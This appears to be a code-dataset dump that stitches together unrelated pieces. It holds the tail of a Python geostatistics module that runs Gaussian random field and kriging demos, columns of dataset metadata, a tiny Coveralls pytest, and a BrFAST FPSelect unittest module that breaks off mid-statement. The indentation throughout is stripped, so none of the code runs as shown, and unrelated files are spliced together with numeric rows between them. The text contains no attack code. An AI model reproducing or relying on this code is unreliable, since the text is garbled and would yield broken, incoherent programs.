u = ccirc[np.mod(iz - kz[j], N3), np.mod(iy - ky[j], N2), np.mod(ix - kx[j], N1)] # j-th row of rBA
krigSD[indnc[j]] = np.dot(u,np.linalg.solve(rAA, u))
del(ccirc)
krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))
del(ix, iy, iz, kx, ky, kz)
# ... update if non stationary covariance is specified
if var is not None:
if var.size > 1:
krig = varUpdate.reshape(-1) * krig
if computeKrigSD:
krigSD = varUpdate.reshape(-1) * krigSD
krig.resize(nz, ny, nx)
if computeKrigSD:
krigSD.resize(nz, ny, nx)
krig = krig + mean
if computeKrigSD:
return ([krig, krigSD])
else:
return (krig)
# ----------------------------------------------------------------------------
if __name__ == "__main__":
print("Module 'geone.grf' example:")
import time
import matplotlib.pyplot as plt
import pyvista as pv
from geone import img
from geone import imgplot as imgplt
from geone import imgplot3d as imgplt3
from geone import covModel as gcm
########## 1D case ##########
# Define grid
nx = 2000
dx = 0.5
ox = 0.0
# Define covariance model
cov_model1 = gcm.CovModel1D(elem=[
('gaussian', {'w':8.95, 'r':100}), # elementary contribution
('nugget', {'w':0.05}) # elementary contribution
], name='')
# Define mean and variance of GRF
mean = 10.
# mean = np.linspace(5, 15, nx)
var = None
# var = np.linspace(1, 200, nx)
# Define hard data
x = [10., 50., 400., 800.]
v = [ 8., 9., 8., 12.]
# x, v = None, None
# Set number of realizations
nreal = 2000
# Set seed
np.random.seed(123)
# Generate GRF
t1 = time.time()
grf1 = grf1D(cov_model1, nx, dx, origin=ox,
nreal=nreal, mean=mean, var=var,
x=x, v=v,
method=3, conditioningMethod=2 ) # grf1: (nreal,nx) array
t2 = time.time()
time_case1D = t2-t1
nreal_case1D = nreal
infogrid_case1D = 'grid: {} cells'.format(nx)
# print('Elapsed time: {} sec'.format(time_case1D))
grf1_mean = np.mean(grf1, axis=0) # mean along axis 0
grf1_std = np.std(grf1, axis=0) # standard deviation along axis 0
if x is not None:
# Kriging
t1 = time.time()
krig1, krig1_std = krige1D(x, v, cov_model1, nx, dx, origin=ox,
mean=mean, var=var,
conditioningMethod=2)
t2 = time.time()
time_krig_case1D = t2-t1
#print('Elapsed time for kriging: {} sec'.format(time_krig_case1D))
peak_to_peak_mean1 = np.ptp(grf1_mean - krig1)
peak_to_peak_std1 = np.ptp(grf1_std - krig1_std)
krig1D_done = True
else:
krig1D_done = False
# Display
# -------
# xg: center of grid points
xg = ox + dx * (0.5 + np.arange(nx))
# === 4 real and mean and sd of all real
fig, ax = plt.subplots(figsize=(20,10))
for i in range(4):
plt.plot(xg, grf1[i], label='real #{}'.format(i+1))
plt.plot(xg, grf1_mean, c='black', ls='dashed', label='mean ({} real)'.format(nreal))
plt.fill_between(xg, grf1_mean - grf1_std, grf1_mean + grf1_std, color='gray', alpha=0.5, label='mean +/- sd ({} real)'.format(nreal))
if x is not None:
plt.plot(x, v,'+k', markersize=10)
plt.legend()
plt.title('GRF1D')
# fig.show()
plt.show()
if x is not None:
# === 4 real and kriging estimates and sd
fig, ax = plt.subplots(figsize=(20,10))
for i in range(4):
plt.plot(xg, grf1[i], label='real #{}'.format(i+1))
plt.plot(xg, krig1, c='black', ls='dashed', label='kriging')
plt.fill_between(xg, krig1 - krig1_std, krig1 + krig1_std, color='gray', alpha=0.5, label='kriging +/- sd')
plt.plot(x,v,'+k', markersize=10)
plt.legend()
plt.title('GRF1D AND KRIGE1D')
# fig.show()
plt.show()
# === comparison of mean and sd of all real, with kriging estimates and sd
fig, ax = plt.subplots(figsize=(20,10))
plt.plot(xg, grf1_mean - krig1, c='black', label='grf1_mean - krig')
plt.plot(xg, grf1_std - krig1_std, c='red', label='grf1_std - krig1_std')
plt.axhline(y=0)
for xx in x:
plt.axvline(x=xx)
plt.legend()
plt.title('GRF1D and KRIGE1D / nreal={}'.format(nreal))
# fig.show()
plt.show()
del(krig1, krig1_std)
del (grf1, grf1_mean, grf1_std)
########## 2D case ##########
# Define grid
nx, ny = 231, 249
dx, dy = 1., 1.
ox, oy = 0., 0.
dimension = [nx, ny]
spacing = [dx, dy]
origin = [ox, oy]
# Define covariance model
cov_model2 = gcm.CovModel2D(elem=[
('gaussian', {'w':8.5, 'r':[150, 40]}), # elementary contribution
('nugget', {'w':0.5}) # elementary contribution
], alpha=-30., name='')
# Define mean and variance of GRF
mean = 10.
# mean = sum(np.meshgrid(np.linspace(2, 8, nx), np.linspace(2, 8, ny)))
var = None
# var = sum(np.meshgrid(np.linspace(2, 100, nx), np.linspace(2, 100, ny)))
# Define hard data
x = np.array([[ 10., 20.], # 1st point
[ 50., 40.], # 2nd point
[ 20., 150.], # 3rd point
[200., 210.]]) # 4th point
v = [ 8., 9., 8., 12.] # values
# x, v = None, None
# Set number of realizations
nreal = 1000
# Set seed
np.random.seed(123)
# Generate GRF
t1 = time.time()
grf2 = grf2D(cov_model2, dimension, spacing, origin=origin,
nreal=nreal, mean=mean, var = var,
x=x, v=v,
method=3, conditioningMethod=2) # grf2: (nreal,ny,nx) array
t2 = time.time()
nreal_case2D = nreal
time_case2D = t2-t1
infogrid_case2D = 'grid: {} cells ({} x {})'.format(nx*ny, nx, ny)
# print('Elapsed time: {} sec'.format(time_case2D))
# Fill an image (Img class) (for display, see below)
im2 = img.Img(nx, ny, 1, dx, dy, 1., ox, oy, 0., nv=nreal, val=grf2)
del(grf2)
# Compute mean and standard deviation over the realizations
im2_mean = img.imageContStat(im2, op='mean') # pixel-wise mean
im2_std = img.imageContStat(im2, op='std') # pixel-wise standard deviation
# grf2_mean = np.mean(grf.reshape(nreal, -1), axis=0).reshape(ny, nx)
# grf2_std = np.std(grf.reshape(nreal, -1), axis=0).reshape(ny, nx)
if x is not None:
# Kriging
t1 = time.time()
krig2, krig2_std = krige2D(x, v, cov_model2, dimension, spacing, origin=origin,
mean=mean, var=var,
conditioningMethod=2)
t2 = time.time()
time_krig_case2D = t2-t1
# print('Elapsed time for kriging: {} sec'.format(time_krig_case2D))
# Fill an image (Img class) (for display, see below)
im2_krig = img.Img(nx, ny, 1, dx, dy, 1., ox, oy, 0., nv=2, val=np.array((krig2, krig2_std)))
del(krig2, krig2_std)
peak_to_peak_mean2 = np.ptp(im2_mean.val[0] - im2_krig.val[0])
peak_to_peak_std2 = np.ptp(im2_mean.val[0] - im2_krig.val[1])
krig2D_done = True
else:
krig2D_done = False
# Display (using geone.imgplot)
# -------
# === 4 real and mean and standard deviation of all real
# and kriging estimates and standard deviation (if conditional)
if x is not None:
nc = 4
else:
nc = 3
fig, ax = plt.subplots(2, nc, figsize=(24,12))
# 4 first real ...
pnum = [1, 2, nc+1, nc+2]
for i in range(4):
plt.subplot(2, nc, pnum[i])
imgplt.drawImage2D(im2, iv=i)
if x is not None:
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('GRF2D {}: real #{}'.format(cov_model2.name, i+1))
# mean of all real
plt.subplot(2, nc, 3)
imgplt.drawImage2D(im2_mean)
if x is not None:
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('Mean over {} real'.format(nreal))
# standard deviation of all real
plt.subplot(2, nc, nc+3)
imgplt.drawImage2D(im2_std, cmap='viridis')
if x is not None:
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('St. dev. over {} real'.format(nreal))
if x is not None:
# kriging estimates
plt.subplot(2, nc, 4)
imgplt.drawImage2D(im2_krig, iv=0)
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('Kriging estimates')
# kriging standard deviation
plt.subplot(2, nc, nc+4)
imgplt.drawImage2D(im2_krig, iv=1, cmap='viridis')
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('Kriging st. dev.')
plt.suptitle('GRF2D and KRIGE2D')
# fig.show()
plt.show()
if x is not None:
# === comparison of mean and st. dev. of all real, with kriging estimates and st. dev.
fig, ax = plt.subplots(1,2,figsize=(15,5))
# grf mean - kriging estimates
im_tmp = img.copyImg(im2_mean)
im_tmp.val[0] = im_tmp.val[0] - im2_krig.val[0]
plt.subplot(1,2,1)
imgplt.drawImage2D(im_tmp, cmap='viridis')
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('grf mean - kriging estimates / nreal={}'.format(nreal))
# grf st. dev. - kriging st. dev.
im_tmp = img.copyImg(im2_std)
im_tmp.val[0] = im_tmp.val[0] - im2_krig.val[1]
plt.subplot(1,2,2)
imgplt.drawImage2D(im_tmp, cmap='viridis')
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('grf st. dev. - kriging st. dev. / nreal={}'.format(nreal))
plt.suptitle('GRF2D and KRIGE2D: comparisons')
# fig.show()
plt.show()
del(im2_krig)
del(im2, im2_mean, im2_std)
########## 3D case ##########
# Define grid
nx, ny, nz = 85, 56, 34
dx, dy, dz = 1., 1., 1.
ox, oy, oz = 0., 0., 0.
dimension = [nx, ny, nz]
spacing = [dx, dy, dy]
origin = [ox, oy, oz]
# Define covariance model
cov_model3 = gcm.CovModel3D(elem=[
('gaussian', {'w':8.5, 'r':[40, 20, 10]}), # elementary contribution
('nugget', {'w':0.5}) # elementary contribution
], alpha=-30., beta=-40., gamma=20., name='')
# Define mean and variance of GRF
mean = 10.
# mean = sum(np.meshgrid(np.linspace(2, 10, ny), np.linspace(2, 8, nz), np.repeat(0, nx))) # as this!!!
var = None
# var = sum(np.meshgrid(np.linspace(2, 400, ny), np.repeat(0, nz), np.linspace(2, 100, nx))) # as this!!!
# Define hard data
x = np.array([[ 10.5, 20.5, 3.5], # 1st point
[ 40.5, 10.5, 10.5], # 2nd point
[ 30.5, 40.5, 20.5], # 3rd point
[ 30.5, 30.5, 30.5]]) # 4th point
v = [ -3., 2., 5., -1.] # values
# x, v = None, None
# Set number of realizations
nreal = 500
# Set seed
np.random.seed(123)
# Generate GRF
t1 = time.time()
grf3 = grf3D(cov_model3, dimension, spacing, origin=origin,
nreal=nreal, mean=mean, var=var,
x=x, v=v,
method=3, conditioningMethod=2) # grf: (nreal,nz,ny,nx) array
t2 = time.time()
nreal_case3D = nreal
time_case3D = t2-t1
infogrid_case3D = 'grid: {} cells ({} x {} x {})'.format(nx*ny*nz, nx, ny, nz)
# print('Elapsed time: {} sec'.format(time_case3D))
# Fill an image (Img class) (for display, see below)
im3 = img.Img(nx, ny, nz, dx, dy, dz, ox, oy, oz, nv=nreal, val=grf3)
del(grf3)
# Compute mean and standard deviation over the realizations
im3_mean = img.imageContStat(im3, op='mean') # pixel-wise mean
im3_std = img.imageContStat(im3, op='std') # pixel-wise standard deviation
# grf3_mean = np.mean(grf.reshape(nreal, -1), axis=0).reshape(nz, ny, nx)
# grf3_std = np.std(grf.reshape(nreal, -1), axis=0).reshape(nz, ny, nx)
if x is not None:
# Kriging
t1 = time.time()
krig3, krig3_std = krige3D(x, v, cov_model3, dimension, spacing, origin=origin,
mean=mean, var=var,
conditioningMethod=2)
t2 = time.time()
time_krig_case3D = t2-t1
# print('Elapsed time for kriging: {} sec'.format(time_krig_case3D))
# Fill an image (Img class) (for display, see below)
im3_krig = img.Img(nx, ny, nz, dx, dy, dz, ox, oy, oz, nv=2, val=np.array((krig3, krig3_std)))
del(krig3, krig3_std)
peak_to_peak_mean3 = np.ptp(im3_mean.val[0] - im3_krig.val[0])
peak_to_peak_std3 = np.ptp(im3_mean.val[0] - im3_krig.val[1])
krig3D_done = True
else:
krig3D_done = False
# Display (using geone.imgplot3d)
# -------
# === Show first real - volume in 3D
imgplt3.drawImage3D_volume(im3, iv=0,
text='GRF3D: real #1',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# === Show first real - (out) surface in 3D
imgplt3.drawImage3D_surface(im3, iv=0,
text='GRF3D: real #1',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# === Show first real - slices in 3D block
# ... slices orthogonal to axes and going through the center of image
cx = im3.ox + 0.5 * im3.nx * im3.sx
cy = im3.oy + 0.5 * im3.ny * im3.sy
cz = im3.oz + 0.5 * im3.nz * im3.sz # center of image (cx, cy, cz)
imgplt3.drawImage3D_slice(im3, iv=0,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: real #1',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# === Show first real - slices in 3D block
# ... slices orthogonal to axes and going through the first data point
# + display the data points
cmap = plt.get_cmap('nipy_spectral') # color map
cmin=im3.vmin()[0] # min value for real 0
cmax=im3.vmax()[0] # max value for real 0
data_points_col = [cmap((vv-cmin)/(cmax-cmin)) for vv in v] # color for data points according to their value
pp = pv.Plotter()
imgplt3.drawImage3D_slice(im3, iv=0, plotter=pp,
slice_normal_x=x[0,0],
slice_normal_y=x[0,1],
slice_normal_z=x[0,2],
show_bounds=True,
text='GRF3D: real #1',
cmap=cmap, cmin=cmin, cmax=cmax, scalar_bar_kwargs={'vertical':True, 'title':None}) # specify color map and cmin, cmax
data_points = pv.PolyData(x)
data_points['colors'] = data_points_col
pp.add_mesh(data_points, cmap=cmap, rgb=True,
point_size=20., render_points_as_spheres=True)
pp.show()
# === Show first real - slices in 3D block
# ... slices orthogonal to axes supporting the ranges according to rotation
# defined in the covariance model and going through the center of image
mrot = cov_model3.mrot()
imgplt3.drawImage3D_slice(im3, iv=0,
slice_normal_custom=[[mrot[:,0], (cx, cy, cz)], [mrot[:,1], (cx, cy, cz)], [mrot[:,2], (cx, cy, cz)]],
text='GRF3D: real #1',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# === Show two first reals, mean and st. dev. over real,
# and kriging estimates and standard deviation (if conditional)
# - volume in 3D
if x is not None:
nc = 3
else:
nc = 2
pp = pv.Plotter(shape=(2, nc))
# 2 first reals
for i in (0, 1):
pp.subplot(i, 0)
imgplt3.drawImage3D_volume(im3, iv=i, plotter=pp,
text='GRF3D: real #{}'.format(i+1),
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# mean of all real
pp.subplot(0, 1)
imgplt3.drawImage3D_volume(im3_mean, plotter=pp,
text='GRF3D: mean over {} real'.format(nreal),
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# standard deviation of all real
pp.subplot(1, 1)
imgplt3.drawImage3D_volume(im3_std, plotter=pp,
text='GRF3D: st. dev. over {} real'.format(nreal),
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
if x is not None:
# kriging estimates
pp.subplot(0, 2)
imgplt3.drawImage3D_volume(im3_krig, iv=0, plotter=pp,
text='GRF3D: kriging estimates',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# kriging standard deviation
pp.subplot(1, 2)
imgplt3.drawImage3D_volume(im3_krig, iv=1, plotter=pp,
text='GRF3D: kriging st. dev.',
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
pp.link_views()
pp.show()
# === Show two first reals, mean and st. dev. over real,
# and kriging estimates and standard deviation (if conditional)
# - slices in 3D block
# ... slices orthogonal to axes and going through the center of image
if x is not None:
nc = 3
else:
nc = 2
pp = pv.Plotter(shape=(2, nc))
# 2 first reals
for i in (0, 1):
pp.subplot(i, 0)
imgplt3.drawImage3D_slice(im3, iv=i, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: real #{}'.format(i+1),
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# mean of all real
pp.subplot(0, 1)
imgplt3.drawImage3D_slice(im3_mean, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: mean over {} real'.format(nreal),
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# mean of all real
pp.subplot(1, 1)
imgplt3.drawImage3D_slice(im3_std, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: st. dev. over {} real'.format(nreal),
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
if x is not None:
# kriging estimates
pp.subplot(0, 2)
imgplt3.drawImage3D_slice(im3_krig, iv=0, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: kriging estimates',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# kriging standard deviation
pp.subplot(1, 2)
imgplt3.drawImage3D_slice(im3_krig, iv=1, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: kriging st. dev.',
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
pp.link_views()
pp.show()
if x is not None:
# === Show comparison of mean and st. dev. of all real, with kriging estimates and st. dev.
# - volume in 3D
pp = pv.Plotter(shape=(1, 2))
# grf mean - kriging estimates
im_tmp = img.copyImg(im3_mean)
im_tmp.val[0] = im_tmp.val[0] - im3_krig.val[0]
pp.subplot(0, 0)
imgplt3.drawImage3D_volume(im_tmp, plotter=pp,
text='GRF3D: grf mean - kriging estimates / nreal={}'.format(nreal),
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
# grf st. dev. - kriging st. dev.
im_tmp = img.copyImg(im3_std)
im_tmp.val[0] = im_tmp.val[0] - im3_krig.val[1]
pp.subplot(0, 1)
imgplt3.drawImage3D_volume(im_tmp, plotter=pp,
text='GRF3D: grf st. dev. - kriging st. dev. / nreal={}'.format(nreal),
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
pp.link_views()
pp.show()
del(im3_krig)
del(im3, im3_mean, im3_std)
######### Print info: elapsed time, peak to peak for "mean of real - krig est." and "std. of real - krig std." ##########
print('Case 1D\n-------')
print(' Simulation - elapsed time: {:5.2f} sec ({} real, {})'.format(time_case1D, nreal_case1D, infogrid_case1D))
print(' Kriging - elapsed time: {:5.2f} sec'.format(time_krig_case1D))
if krig1D_done:
print(' Peak to peak for "grf1_mean - krig1" : {}'.format(peak_to_peak_mean1))
print(' Peak to peak for "grf1_std - krig1_std": {}'.format(peak_to_peak_std1))
print('\n')
print('Case 2D\n-------')
print(' Simulation - elapsed time: {:5.2f} sec ({} real, {})'.format(time_case2D, nreal_case2D, infogrid_case2D))
print(' Kriging - elapsed time: {:5.2f} sec'.format(time_krig_case2D))
if krig2D_done:
print(' Peak to peak for "grf2_mean - krig2" : {}'.format(peak_to_peak_mean2))
print(' Peak to peak for "grf2_std - krig2_std": {}'.format(peak_to_peak_std2))
print('\n')
print('Case 3D\n-------')
print(' Simulation - elapsed time: {:5.2f} sec ({} real, {})'.format(time_case3D, nreal_case3D, infogrid_case3D))
print(' Kriging - elapsed time: {:5.2f} sec'.format(time_krig_case3D))
if krig3D_done:
print(' Peak to peak for "grf3_mean - krig3" : {}'.format(peak_to_peak_mean3))
print(' Peak to peak for "grf3_std - krig3_std": {}'.format(peak_to_peak_std3))
######### END ##########
a = input("Press enter to continue...")
| 40.955766
| 138
| 0.516445
| 19,423
| 155,550
| 4.108377
| 0.037996
| 0.00708
| 0.01584
| 0.004135
| 0.940261
| 0.924997
| 0.911613
| 0.899545
| 0.890184
| 0.871562
| 0
| 0.02781
| 0.361273
| 155,550
| 3,797
| 139
| 40.966553
| 0.775349
| 0.537879
| 0
| 0.736491
| 0
| 0
| 0.148188
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00467
| false
| 0
| 0.005337
| 0
| 0.05537
| 0.164109
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8cf1aaa63f4a738ab93206f90924f1b8b1c69477
| 140
|
py
|
Python
|
tests/test_coveralls_project_exists.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 5
|
2019-09-17T14:46:35.000Z
|
2020-06-06T08:17:02.000Z
|
tests/test_coveralls_project_exists.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 2
|
2020-12-18T01:47:55.000Z
|
2020-12-25T10:08:30.000Z
|
tests/test_coveralls_project_exists.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | null | null | null |
from setup_python_package.utils import coveralls_project_exists
def test_coveralls_project_exists():
assert coveralls_project_exists()
| 28
| 63
| 0.864286
| 18
| 140
| 6.222222
| 0.666667
| 0.428571
| 0.589286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092857
| 140
| 5
| 64
| 28
| 0.88189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
50d98adfb7269b25065da66e4367978ff0fa0f0d
| 14,611
|
py
|
Python
|
tests/exploration/test_fpselect.py
|
tandriamil/BrFAST
|
b687a356acc813d45dbaf5b5eb0f360df181904a
|
[
"MIT"
] | 6
|
2021-04-20T17:33:17.000Z
|
2021-12-20T18:59:58.000Z
|
tests/exploration/test_fpselect.py
|
tandriamil/BrFAST
|
b687a356acc813d45dbaf5b5eb0f360df181904a
|
[
"MIT"
] | null | null | null |
tests/exploration/test_fpselect.py
|
tandriamil/BrFAST
|
b687a356acc813d45dbaf5b5eb0f360df181904a
|
[
"MIT"
] | 2
|
2021-12-20T19:00:03.000Z
|
2022-03-22T01:57:41.000Z
|
#!/usr/bin/python3
"""Test module of the exploration module of BrFAST.
The data used for the tests is a simple simulation of the lattice example of
our FPSelect paper.
"""
import importlib
import json
import unittest
from math import log2
from os import path, remove
from pathlib import PurePath
from typing import Any, Dict
from brfast.config import ANALYSIS_ENGINES
from brfast.data.attribute import AttributeSet
from brfast.exploration import (
Exploration, ExplorationNotRun, ExplorationParameters,
SensitivityThresholdUnreachable, State, TraceData)
from brfast.exploration.fpselect import FPSelect, FPSelectParameters
from brfast.measures import UsabilityCostMeasure, SensitivityMeasure
from tests.data import ATTRIBUTES, DummyCleanDataset
from tests.exploration import SENSITIVITY_THRESHOLD, TRACE_FILENAME
from tests.exploration.test_exploration import TestExploration
from tests.measures import DummySensitivity, DummyUsabilityCostMeasure
# Import the engine of the analysis module (pandas or modin)
from brfast.config import params
pd = importlib.import_module(params['DataAnalysis']['engine'])
TRACES_DIRECTORY = 'assets/traces'
EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_ON = '/'.join(
[TRACES_DIRECTORY, 'expected_trace_fpselect_multipath_pruning_on.json'])
EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_OFF = '/'.join(
[TRACES_DIRECTORY, 'expected_trace_fpselect_multipath_pruning_off.json'])
EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_ON = '/'.join(
[TRACES_DIRECTORY, 'expected_trace_fpselect_singlepath_pruning_on.json'])
EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_OFF = '/'.join(
[TRACES_DIRECTORY, 'expected_trace_fpselect_singlepath_pruning_off.json'])
MULTI_EXPLR_PATHS = 2
PRUNING_ON = True
PRUNING_OFF = False
# ======= FPSelect with a single process and using the DummyCleanDataset ======
class TestFPSelectSinglePathPruningOn(TestExploration):
def setUp(self):
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_ON
self._explored_paths = 1
self._pruning = PRUNING_ON
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'false')
def test_exploration_base_class(self):
pass # This selection method defines the run method
def test_parameters(self):
additional_parameters = {
FPSelectParameters.EXPLORED_PATHS: self._explored_paths,
FPSelectParameters.PRUNING: self._pruning}
self.check_parameters(additional_parameters)
def test_run_sensitivity_unreachable(self):
unreachable_sensitivity_threshold = 0.0
unreachable_exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, unreachable_sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
with self.assertRaises(SensitivityThresholdUnreachable):
unreachable_exploration.run()
def test_run_asynchronous_sensitivity_unreachable(self):
unreachable_sensitivity_threshold = 0.0
unreachable_exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, unreachable_sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
process = unreachable_exploration.run_asynchronous()
process.join() # Wait for the process to end
with self.assertRaises(SensitivityThresholdUnreachable):
unreachable_exploration.get_solution()
with self.assertRaises(SensitivityThresholdUnreachable):
unreachable_exploration.get_satisfying_attribute_sets()
# with self.assertRaises(SensitivityThresholdUnreachable):
# unreachable_exploration.get_explored_attribute_sets()
with self.assertRaises(SensitivityThresholdUnreachable):
unreachable_exploration.get_execution_time()
def test_run(self):
# Run the exploration
self._exploration.run()
# Load the comparison file as a json dictionary
tests_module_path = PurePath(path.abspath(__file__)).parents[1]
comparison_trace_path = tests_module_path.joinpath(
self._expected_trace_path)
with open(comparison_trace_path, 'r') as comparison_file:
comparison_dict = json.load(comparison_file)
expected_explored_attribute_sets = comparison_dict[
TraceData.EXPLORATION]
expected_solution = AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1]})
expected_satisfying_attribute_sets = {
AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1]}),
AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1], ATTRIBUTES[2]})}
self.check_run(expected_solution, expected_satisfying_attribute_sets,
expected_explored_attribute_sets,
check_exploration=False)
def test_run_asynchronous(self):
# Run the exploration
process = self._exploration.run_asynchronous()
process.join() # Wait for the process to end
# Load the comparison file as a json dictionary
tests_module_path = PurePath(path.abspath(__file__)).parents[1]
comparison_trace_path = tests_module_path.joinpath(
self._expected_trace_path)
with open(comparison_trace_path, 'r') as comparison_file:
comparison_dict = json.load(comparison_file)
expected_explored_attribute_sets = comparison_dict[
TraceData.EXPLORATION]
expected_solution = AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1]})
expected_satisfying_attribute_sets = {
AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1]}),
AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1], ATTRIBUTES[2]})}
self.check_run(expected_solution, expected_satisfying_attribute_sets,
expected_explored_attribute_sets,
check_exploration=False)
def test_wrong_number_of_explored_paths(self):
with self.assertRaises(AttributeError):
unaccepted_number_of_explored_paths = 0
wrong_number_of_explored_paths = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=unaccepted_number_of_explored_paths,
pruning=self._pruning)
with self.assertRaises(AttributeError):
unaccepted_number_of_explored_paths = -3
wrong_number_of_explored_paths = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=unaccepted_number_of_explored_paths,
pruning=self._pruning)
def test_save_trace(self):
# Run the exploration
self._exploration.run()
self._check_save_trace(check_exploration=False)
def test_save_trace_asynchronous(self):
# Run the exploration
process = self._exploration.run_asynchronous()
process.join() # Wait for the process to end
self._check_save_trace(check_exploration=False)
class TestFPSelectSinglePathPruningOff(TestFPSelectSinglePathPruningOn):
def setUp(self):
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_OFF
self._explored_paths = 1
self._pruning = PRUNING_OFF
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'false')
class TestFPSelectMultipathPruningOn(TestFPSelectSinglePathPruningOn):
def setUp(self):
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_ON
self._explored_paths = MULTI_EXPLR_PATHS
self._pruning = PRUNING_ON
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'false')
class TestFPSelectMultipathPruningOff(TestFPSelectSinglePathPruningOn):
def setUp(self):
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_OFF
self._pruning = PRUNING_OFF
self._explored_paths = MULTI_EXPLR_PATHS
self._exploration = FPSelect(
